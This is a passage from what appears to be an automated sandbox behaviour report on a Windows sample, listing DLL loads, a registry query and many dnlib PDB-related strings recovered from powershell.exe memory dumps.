Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000004.00000002.2427497580.00007FFE168A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.pdbCB source: powershell.exe, 00000004.00000002.2386191358.00000207290C5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000004.00000002.2418527103.00000207430FE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2420242779.00000207432A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ows\System.Core.pdb$:IYN source: powershell.exe, 00000004.00000002.2418527103.00000207430E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000004.00000002.2427497580.00007FFE168A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: 089\System.Core.pdb source: powershell.exe, 00000004.00000002.2420242779.00000207432BC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ystem.pdb source: powershell.exe, 00000004.00000002.2418527103.00000207430E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
